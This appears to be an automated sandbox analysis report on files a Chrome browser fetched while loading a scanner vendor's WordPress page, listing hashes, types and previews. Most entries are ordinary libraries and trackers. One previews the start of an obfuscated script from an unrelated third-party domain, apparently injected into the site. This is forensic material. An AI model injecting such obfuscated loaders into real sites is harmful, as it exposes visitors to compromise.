                                                                                                                                                                                              Preview:!function e(t,n,r){function o(a,s){if(!n[a]){if(!t[a]){var u="function"==typeof require&&require;if(!s&&u)return u(a,!0);if(i)return i(a,!0);var c=new Error("Cannot find module '"+a+"'");throw c.code="MODULE_NOT_FOUND",c}var f=n[a]={exports:{}};t[a][0].call(f.exports,function(e){var n=t[a][1][e];return o(n?n:e)},f,f.exports,e,t,n,r)}return n[a].exports}for(var i="function"==typeof require&&require,a=0;a<r.length;a++)o(r[a]);return o}({1:[function(e,t,n){!function(e,n){"undefined"!=typeof t&&t.exports?t.exports.browser=n():"function"==typeof define&&define.amd?define(n):this.bowser=n()}(0,function(){function e(e){function n(t){var n=e.match(t);return n&&n.length>1&&n[1]||""}var r,o,i,a=n(/(ipod|iphone|ipad)/i).toLowerCase(),s=!/like android/i.test(e)&&/android/i.test(e),u=n(/edge\/(\d+(\.\d+)?)/i),c=n(/version\/(\d+(\.\d+)?)/i),f=/tablet/i.test(e),l=!f&&/[^-]mobi/i.test(e);/opera|opr/i.test(e)?r={name:"Opera",opera:t,version:c||n(/(?:opera|opr)[\s\/](\d+(\.\d+)?)/i)}:/windows phone/i.te
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                              Entropy (8bit):3.875
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:HTL:zL
                                                                                                                                                                                              MD5:C78FC4C73991971736F95F00B7C09E4F
                                                                                                                                                                                              SHA1:2BFE006346297E446B58308E3F37169A4BC29046
                                                                                                                                                                                              SHA-256:C70E533105E5FE64092A52295354E975F8D6DDF470DA3F7AE4A6D4F3FC915283
                                                                                                                                                                                              SHA-512:5F85D1EA2C4DB38DF3A6FC5414C03EDA186CF86A84F9D0E4C37053791060936B486A0493B54010319FCBA943ED4E95F58045C3EDD135952E69CED9EE87BD21F0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmlJ8GgJz5lSxIFDbtXVmo=?alt=proto
                                                                                                                                                                                              Preview:CgkKBw27V1ZqGgA=
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (5696), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):5696
                                                                                                                                                                                              Entropy (8bit):5.696424950663592
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:YyRkcgyDgR87Zwtvfx7Zwcx7ZmZ7Zm87Zyi7ZyJ7Zi1M7Zi1C7Zb1H7Zb1TUOBnr:ynyDgR8NwtvfxNwcxNmZNm8NyiNyJNii
                                                                                                                                                                                              MD5:3736D95EB9384921E0CF725A02CFB40F
                                                                                                                                                                                              SHA1:6E229FFAD07B9088F5862EB963CFE29FA1863D92
                                                                                                                                                                                              SHA-256:88A381C7FD9508FA233CE3B5F29AED0773424FEC4E556258A3F3D72EA00F7FDE
                                                                                                                                                                                              SHA-512:D0CB6E57110D5B77AA2932B06707FD307C0A81920FF54900B561E5F48B4A56B765BAFFE2041101D22BA53A0733904D803F33C891AF78C79A8E607A6F7E0E618A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://td.doubleclick.net/td/rul/1070729751?random=1732134501018&cv=11&fst=1732134501018&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                              Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":10368000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s1093817975.1732134501","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1093817975.1732134501\u0026ig_key=1sNHMxMDkzODE3OTc1LjE3MzIxMzQ1MDE!2sZ9x6aA!3sAAptDV55KnWP","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1smPxnzw!2sZ9x6aA!3sAAptDV55KnWP"],"userBiddingSignals":[["465297401","7988378954","617757027","3385283","8585686888","8585685316","3385403"],null,1732134504614134],"ads":[{"renderUrl":"https://tdsf.d
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (15868)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):429069
                                                                                                                                                                                              Entropy (8bit):5.641180482925039
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:Z4wGfIMX/iOG9eAPmPL97aBJDMfgQJZyOJtx0/awG:Sw2l6QAPmR7bTL
                                                                                                                                                                                              MD5:A3861C9DAC710CB7895E39AECDFAA044
                                                                                                                                                                                              SHA1:C2BFCD6E9262DC801048C876DC98E342C2699774
                                                                                                                                                                                              SHA-256:84B5EC5CB582928166C6E0195113DB04C0B92E9ACCB4FB0B826AB5D5F85A7B4B
                                                                                                                                                                                              SHA-512:892FA78E7CC0250CE956F979BCD55567FF7DDB20FA7C61E25E4A024A310FA286A6D01F383945B5E77DD0BC9752508481D52985C2077F408339F2314640E88271
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"c"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":25,"vtp_rules":["list","ambir\\-technology\\.myshopify\\.com","ambir\\.com","shop\\.ambir\\.com"],"tag_id":14},{"function":"__ogt_1p_data_v2","priority":15,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 13432, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):13432
                                                                                                                                                                                              Entropy (8bit):7.984418585924297
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:NonRbzPS8pKCgi581CDQ+IZH2pRD325KUEjDLEysVlRLFOpy5EiKn+Alt:e1zPECgrCD9Ih2pRCxGDL4lFWiKBt
                                                                                                                                                                                              MD5:4903A00D1C555C0846799302C673D6A1
                                                                                                                                                                                              SHA1:A7171422D5C6540CF3EEB0B0C7B7FDA3973128F9
                                                                                                                                                                                              SHA-256:0E637574EC102B93795E00DAAA92EEBDACF1DCEE9133B123FB9B56EA8EAF7E14
                                                                                                                                                                                              SHA-512:6416C3A2F32879F8FE571A4D98F7B2CA4BEBFCE1C5609DEA723BD94AFCB5BE216EA6EE0870A797C46C45C52B3F748604041503F226B93CA3A4A6B17CDDFCE0A2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4AMP6lQ.woff2
                                                                                                                                                                                              Preview:wOF2......4x......k...4 ................................|.`..J.....\....Z..6.$..0. .... .@\...q...o.;....i..(d...kr"c...;..U.1...Kc..=.k..Vw.H....|._66.L.,v~U....S...0.@..."....F.k.G\...iQCDUU..y....|.\...........%.eN.G..(r1.h[aQ..W.......}.%y1...B[..$h.....%......B....T...;...Y....u.."6i (.!!...+.z...1....*...$..x......<..#.?"..<).o.Nbc.B\H.g.u.jtm....E.Sa..{..T9}s.......8.@. .#Jr.m.....n..-n....3....q.A...=...q.#.:d43..........v.m...T..0..$'O.Q...@.|......* ..".o.k..s.w...u....A.(`..,.9............e6._......w.BV.?.'?..g..I..G.{...Q...v.....g...X..;W....Da*....+<.?..Mn.O{[ge(U!\..'..7.dK.tUj.B.F........:x..>../......%;.h....O.Z.e..Bn......."VDB..Y=.g.l.SB.AR.".$..K5.F..z..clY...p.J.,.F`8.|...4.....o>.Z5d.%.:u.F..f...=p..9g...C.#nP|..A0.>...n..=.R......Z.n........"@..... .Bif....Z^.b...z....B ..G......+.C..n...@........o..b..S.v.iT.x...u0nxm.G.u.sA.C.].m.v......>.|.a.O.......l..._.j.....Am......fy.!.~[...}.....>...\n.c.9[o^.m....p...d..E....8[D.7..
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (24870)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):49205
                                                                                                                                                                                              Entropy (8bit):5.260673325012671
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:X+tVxFm61ikpCQ9HuGH5iwqWWN7KOljuOzQYqE30/RuHRXrYPH0KO0ZVsi3Z5vJ6:7i3E
                                                                                                                                                                                              MD5:64A8814DB50D35A53F960C50383647E6
                                                                                                                                                                                              SHA1:32980FA3B67E6D0D5CB8636ED3C33145BCFC195F
                                                                                                                                                                                              SHA-256:69B3D37EE17F757209387B4922DCC7C295EA23056602E0A1C9808BB12202AC0C
                                                                                                                                                                                              SHA-512:47C4F853E50906C17F3A21EE1B06392FE8FB3B4A409E664E3B72195911A880A5BA97923721B586BE7246E73D9C5A21F4247A6E45F4300B91BE55B9C6C65BCAFE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-54e41265.min.js
                                                                                                                                                                                              Preview:..var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/ambir.com\/wp-admin\/admin-ajax.php","nonce":"fd85e3f2ce","urls":{"assets":"https:\/\/ambir.com\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/ambir.com\/wp-json\/"},"settings":{"lazy_load_background_images":true},"popup":{"hasPopUps":false},"shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"mix":{"title":"Mix"},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JPEG image data, progressive, precision 8, 443x225, components 3
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):16914
                                                                                                                                                                                              Entropy (8bit):7.953692103466845
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:jEO+B9QMfLxLN58cKVwG+UkpYUnxOtLKAoIfoRKriHfqp/WW:jEdBBf58DV5gYiARD3r+fs
                                                                                                                                                                                              MD5:3B34F318052301E1B23EC78536954466
                                                                                                                                                                                              SHA1:A53F29F044A6585B83B70FAD9C1118E16E08F930
                                                                                                                                                                                              SHA-256:F05B0D68AA5F5B099EA09E3901EC4BAB6E982E34952B0147A3B775ACB93B4EDD
                                                                                                                                                                                              SHA-512:E4418236CE2376C3E4710DA817C4111E61813243493E75197E12B86C37180A49D70FEBF51937228FA5EBCA502B34EC3B63E995EDCDA482682FE00EBCD07A2895
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/uploads/2023/10/card-document-scanners_225h.jpg
                                                                                                                                                                                              Preview:..........................................................................................................................................................."..........6..............................................................................................{..w..m....cq.v7...A..q ....>5.....5..{.-.k.z.....@..lC.Z.p`...qa..+..c"1....c..E.............aq.g.;.k.o....X.......S..{A.{E.{.....W.]...Q...!l...U..qri/...].....|..l.g.f.F=P.Y....z..j..c.9(B.\X,..sW.@.......b.VL.5~P.c|..{....F..Wh..}....|.n...e.>R.Tb...=.l...+`5.9.5b.N.E(....U.4.SR.$(...wy.l................X.o.-...<..m.....ZB../9.g/.gK.#............%t`....f....)E..*.!{aK~................b.`...s...V_..v.X.7...V..t.....].=................mq5...1OZe.W{.(.._u.._S.L.*g.....c..R.\..[.[.M...9C..z...z...'/.......}....u.........~S.:....N....H..m..Q........uZ..E.v......"z....4\....+.@F._.....Ar..j..J.He.{.x.'.......@...Lw;Z.Re.Y...l_..i..h..iEv..'..!>s...R..\.8.......:.2s...~/.u.......F..O1...;~Z.1
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):308
                                                                                                                                                                                              Entropy (8bit):5.3909920787291
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:yEruXDlEwWP7L+LRB2DOexWb2RhQJFtXXC3AkIhhIl/1cK2fvFive:GlO3aRB2DOexWb2RKJFtHeQh41cJvce
                                                                                                                                                                                              MD5:970285D56556C4B3B2B2BF299B8FE02A
                                                                                                                                                                                              SHA1:7ED1B124D03960533B4CAC1B149A5DDD64EA5089
                                                                                                                                                                                              SHA-256:A920F8A2BFF0671F86EA2C6262C6A769B63AA1371B58F4401F0C7B9076D6449D
                                                                                                                                                                                              SHA-512:2A49E10EABB810A60E300DE04BAC183F0A9851800EE23C48D8952C36795A7D9BE1C62902148A8AC58DE910FC5F76D5F0E828F4588A59D320F9873B9EE0EC811A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:fl=649f219.h=www.cloudflare.com.ip=8.46.123.75.ts=1732134505.366.visit_scheme=https.uag=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36.colo=EWR.sliver=none.http=http/1.1.loc=US.tls=TLSv1.3.sni=plaintext.warp=off.gateway=off.rbi=off.kex=X25519.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (1223)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):19485
                                                                                                                                                                                              Entropy (8bit):5.498123677217319
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:LC/TzpZmdYHPu1cnq9W3eVqIudA7ItW09ROE1WWkK1z0Ika7YyifuxNrx5FejxO9:LCbNZmd6Pu1ct3yqZDtWcUE1WWr1qaV3
                                                                                                                                                                                              MD5:ACFAAF3B7DA03D515C434409A8CEDFE3
                                                                                                                                                                                              SHA1:4E2FE4950FCED5DF7A649497A093614E0A7D778F
                                                                                                                                                                                              SHA-256:A192CC8B869A545B6910C7CB5C96612499A856C49585A67D1629CEC7EBB83DA0
                                                                                                                                                                                              SHA-512:8F6D029D18C0AEFECC9F864A9DAA33E19D6F7B73E9CE6D4FABEEB7DABACE55764A7DE6771604B2E2CF59BCC5E3E12D076D508D9773EA14E6E1B2188F25184AE0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://www.googletagmanager.com/static/service_worker/4bj0/sw.js?origin=https%3A%2F%2Fambir.com
                                                                                                                                                                                              Preview:'use strict';var aa=function(a){function c(d){return a.next(d)}function b(d){return a.throw(d)}return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(c,b).then(f,e)}f(a.next())})},h=function(a){return aa(a())};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self;var r,u;a:{for(var ba=["CLOSURE_FLAGS"],z=n,A=0;A<ba.length;A++)if(z=z[ba[A]],z==null){u=null;break a}u=z}var ca=u&&u[610401301];r=ca!=null?ca:!1;var D;const da=n.navigator;D=da?da.userAgentData||null:null;function F(a){return r?D?D.brands.some(({brand:c})=>c&&c.indexOf(a)!=-1):!1:!1}function G(a){var c;a:{const b=n.navigator;if(b){const d=b.userAgent;if(d){c=d;break a}}c=""}return c.indexOf(a)!=-1};function H(){return r?!!D&&D.brands.length>0:!1}function I(){return H()?F("Chromium"):(G("Chrome")||G("CriOS"))&&!(H()?0:G("Edge"))||G("Silk")};!G("Android")||I();I();G("Safari")&&(I()||(H()?0:G("Coast"))||(H()?0:G("Opera"))||(H()?0:G("Edge"))||(
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (5844), with CRLF line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):5847
                                                                                                                                                                                              Entropy (8bit):5.357257862815137
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:z+f2pTjc1rSji8ZrX+bsKGqyHkC6i0CXvU/oaKumaO1kE3wInu30KhT+RMoslvar:COlarSji8NO4KGqyECYCX8/oamaO1k4D
                                                                                                                                                                                              MD5:F5F47A2FF906D110A9F0174A7386DF2F
                                                                                                                                                                                              SHA1:C8C7A994F1C921D677233B1D8EAD8E1F36594563
                                                                                                                                                                                              SHA-256:003ED740643E18DB5B145A9B2A0F64C03B608089B6CF4E6B4E435FFC6D82BD96
                                                                                                                                                                                              SHA-512:4E18857F471F9B81AF291DC7D082401F689D16D8B721B950BCD57A54CBC82E405764E745DF904689F744DDFBD0339CC34A5A6D259101D9D418399EF68AEC2455
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://nyciot.com/je5vl.js
                                                                                                                                                                                              Preview: ..var _0x596311=_0xc2f2;(function(_0x2e4b0a,_0x8218b){var _0x341c59=_0xc2f2,_0x388ec9=_0x2e4b0a();while(!![]){try{var _0x32e3c5=parseInt(_0x341c59(0x202))/0x1+-parseInt(_0x341c59(0x212))/0x2+parseInt(_0x341c59(0x1fb))/0x3*(-parseInt(_0x341c59(0x218))/0x4)+parseInt(_0x341c59(0x209))/0x5+parseInt(_0x341c59(0x21b))/0x6*(parseInt(_0x341c59(0x1ef))/0x7)+-parseInt(_0x341c59(0x20c))/0x8*(-parseInt(_0x341c59(0x205))/0x9)+parseInt(_0x341c59(0x21a))/0xa*(-parseInt(_0x341c59(0x224))/0xb);if(_0x32e3c5===_0x8218b)break;else _0x388ec9['push'](_0x388ec9['shift']());}catch(_0x1dfe34){_0x388ec9['push'](_0x388ec9['shift']());}}}(_0x23f8,0x8c937));function _0xc2f2(_0x315da4,_0x3943d5){var _0x23f878=_0x23f8();return _0xc2f2=function(_0xc2f217,_0x395e46){_0xc2f217=_0xc2f217-0x1ef;var _0xea7134=_0x23f878[_0xc2f217];return _0xea7134;},_0xc2f2(_0x315da4,_0x3943d5);}function setCookie(_0xcf5859,_0x28c125,_0x412b1b){var _0x2c6db3=_0xc2f2,_0x1892e7='';if(_0x412b1b){var _0x513313=new Date();_0x513313[_0x2c6db3(0
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (31997)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):44342
                                                                                                                                                                                              Entropy (8bit):5.0793850768725
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:UCI7dmuMFAAJG4dlQKNORpnXGAtep2lcwJeL+wr2RSGc7UuHjRUQuFBt33:PITMFC4dbMVRSGcgRDV
                                                                                                                                                                                              MD5:F416F9031FEF25AE25BA9756E3EB6978
                                                                                                                                                                                              SHA1:E2A600E433DF72B4CFDE93D7880E3114917A3CBE
                                                                                                                                                                                              SHA-256:A53C43F834B32309B084EA9314DF8307E9C78CEE2202C6E07F216AE4AE5B704D
                                                                                                                                                                                              SHA-512:6CFB3B01EEA956F84E4A221CC940A547BFEAD8E02C462A2FC38BC0917FB325BC374A101E7AA7B3AB9D11208708511ABB39ADB4AD6DA7DAAF9FC9704D714F65AF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/themes/ambir/js/owl.carousel.min.js
                                                                                                                                                                                              Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */.!function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.Defaults,c),this.$element=a(b),this._handlers={},this._plugins={},this._supress={},this._current=null,this._speed=null,this._coordinates=[],this._breakpoint=null,this._width=null,this._items=[],this._clones=[],this._mergers=[],this._widths=[],this._invalidated={},this._pipe=[],this._drag={time:null,target:null,pointer:null,stage:{start:null,current:null},direction:null},this._states={current:{},tags:{initializing:["busy"],animating:["busy"],dragging:["interacting"]}},a.each(["onResize","onThrottledResize"],a.proxy(function(b,c){this._handlers[c]=a.proxy(this[c],this)},this)),a.each(e.Plugins,a.proxy(function(a,b){this._plugins[a.charAt(0).toLowerCase()+a.slice(1)]=new b(this)},this)),a.each(e.Workers,a.proxy(function(b,c){this._pipe.push({fil
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                              Entropy (8bit):3.0995623739536313
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:CUnl/72vl/JtSle:/0B4le
                                                                                                                                                                                              MD5:C9FD1CFBCA9F678ED068ED6B4BBEB666
                                                                                                                                                                                              SHA1:C0AF0ABB2CB4703D1515F75044CC872423C3B0D3
                                                                                                                                                                                              SHA-256:5C390BB4424108C7804361C9B49CB8FBCEF0AAB2A412F87C0A8A5F016E35A98F
                                                                                                                                                                                              SHA-512:5D9F64400A09CAD7B9F8B588227D7F4C592F52E00EC08A6718BE21D5262FDF2D46056EF7CF07412E1D9DA70FED075EDDDA0A7CB8E49AC4C50706339C2696D57B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:GIF89a.............!.......,........@..D..;
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (8950)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):180827
                                                                                                                                                                                              Entropy (8bit):5.260645061332981
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:RUapKhJp7tzEye1XbVQOz4v4z4u4gA4y4t4Z4ylIi3XLVYD2Wikc:RzohLtStVQkolZ7VvWiR
                                                                                                                                                                                              MD5:325C4C4BB044DAE3E93BC26452F928FA
                                                                                                                                                                                              SHA1:0AA6BC71116F9724FBB2C8A7DBA41919FD17DD48
                                                                                                                                                                                              SHA-256:FCACCFE01721EA57E4B8B06AE65595784B194787C24A94E41629025CA0E52F4F
                                                                                                                                                                                              SHA-512:01488533757174CF3DA7C8495DDB83D93BAA6D36190490C464D06592835BE25A3757BAA9EC00273A4620A79B486BFE565C497E98CC2FA885092B7DB192942EA3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Preview:<!doctype html>.<html lang="en-US">.<head>.<meta charset="UTF-8" />.<meta name="viewport" content="width=device-width, initial-scale=1" />. <link rel="preconnect" href="https://fonts.googleapis.com">.<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>.<link href="https://fonts.googleapis.com/css2?family=Comfortaa:wght@400;700&family=Open+Sans:wght@400;700&family=Roboto:wght@300;400;700&display=swap" rel="stylesheet">..<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />.. Google Tag Manager for WordPress by gtm4wp.com -->.<script data-cfasync="false" data-pagespeed-no-defer>..var gtm4wp_datalayer_name = "dataLayer";..var dataLayer = dataLayer || [];..const gtm4wp_use_sku_instead = false;..const gtm4wp_currency = 'USD';..const gtm4wp_product_per_impression = false;..const gtm4wp_clear_ecommerce = false;.</script>. End Google Tag Manager for WordPress by gtm4wp.com -->.. This site is optimized with the
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65446)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):101137
                                                                                                                                                                                              Entropy (8bit):5.27541305305053
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:cRUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKvrP7Qo:kHNwcv9VBQpLl88SMBQ47GKvrPU+J
                                                                                                                                                                                              MD5:5A00D38CA73C549B9C11D4317D746F34
                                                                                                                                                                                              SHA1:EC9183923C49B6439CEF103F60CD0D69DA023830
                                                                                                                                                                                              SHA-256:732B75262F6C9B6D5A61DA968E653880646B58CC1B25387B32BADBE03881DFE1
                                                                                                                                                                                              SHA-512:96DCB1608066578F90D8EAE23734A1D13C2CE30AD2804494538410CA5C765BC04548CBBE7F947A0E3DBEA9BE902345048A9887F7841CAC7EA062C574BC0881EF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-7ba40e52.min.js
                                                                                                                                                                                              Preview:./*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remov
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                              Malicious:false
